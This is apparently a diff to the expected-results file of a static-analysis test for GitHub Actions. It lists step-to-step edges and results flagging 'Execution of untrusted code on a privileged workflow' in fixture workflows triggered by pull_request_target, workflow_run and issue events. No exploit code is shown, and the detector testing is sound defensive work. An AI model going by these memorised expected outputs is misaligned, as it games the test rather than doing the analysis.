Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| 
.github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| 
.github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | 
.github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| .github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| 
.github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | .github/workflows/test14.yml:198:7:206:4 | Uses Step | +| 
.github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run Step: email | .github/workflows/test15.yml:203:7:211:4 | 
Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| 
.github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step | .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | +| .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | +| .github/workflows/test24.yml:10:9:16:6 | Run Step | 
.github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| 
.github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | 
pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | 
.github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | 
.github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml |
+| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml |
+| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml |
+| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml |
+| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml |
+| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml |
+| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) |
.github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml |
+| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step |
.github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml |
+| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml |
